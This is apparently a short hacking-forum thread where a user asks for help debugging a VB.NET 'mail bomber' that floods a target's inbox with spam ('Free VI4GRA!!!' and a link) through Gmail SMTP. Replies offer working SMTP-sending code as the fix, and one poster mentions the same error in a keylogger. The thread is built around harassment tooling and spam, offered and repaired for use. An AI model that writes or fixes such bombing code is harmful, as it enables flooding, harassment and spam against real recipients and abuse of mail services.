Help meeeh!

Posts 1–5 of 5 · Page 1 of 1
Help meeeh!
I've got a new question... I'm busy with my mail bomber V1.1... This is the part where I'm getting an error.

Code:
Private Sub startbtn_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles startbtn.Click
        If CheckBox1.Checked = True Then
            Dim MyMailMessage As New MailMessage()
            MyMailMessage.From = New MailAddress("Grapefruitbomber@gmail.com")
            MyMailMessage.To.Add(tobox.Text)
            MyMailMessage.Subject = ("Free VI4GRA!!!")
            MyMailMessage.Body = ("CAN'T GET IT UP!?!?!? GO TO http://www.freevi4gra.com !")
            Dim SMTPServer As New SmtpClient("smtp.gmail.com")
            SMTPServer.Port = 587
            SMTPServer.Credentials = New System.Net.NetworkCredential(usernamebox.Text, passwordbox.Text)
            SMTPServer.EnableSsl = True
            Label1.Text = Val(Label1.Text + 1)
            SMTPServer.Send(MyMailMessage)
            MsgBox("Please choose a Gmail option!", MsgBoxStyle.Critical, "Error")
        End If

        Timer2.Start()
    End Sub

The
Code:
 SMTPServer.Send(MyMailMessage)
part is marked in yellow...

What should I put there!?

It's the second way of bombing someone.. My bomber has 2 possibilities; Bomb them with your own Gmail and bomb them with a build in Gmail.
Does error occur while debugging? Or is it a warning?
Laat mij straks ff kyken langs teamviewer.
R U ok K4GE? This happens with my keylogger too. Dunno hoow to fix
Use this code to get it work.



[php]Dim smtpserver As New SmtpClient()
Dim mail As New MailMessage()
smtpserver.Credentials = New Net.NetworkCredential("YOURGMAIL@gmail.com", "PASSWORD")
smtpserver.Port = 587
smtpserver.Host = "smtp.gmail.com"
smtpserver.EnableSsl = True
mail.From = New MailAddress("YOURGMAIL@gmail.com")
mail.Subject = "Text: "
mail.To.Add("YOURGMAIL@gmail.com")
mail.Body = "Text: "
smtpserver.Send(mail)[/php]
Posts 1–5 of 5 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

Talk with us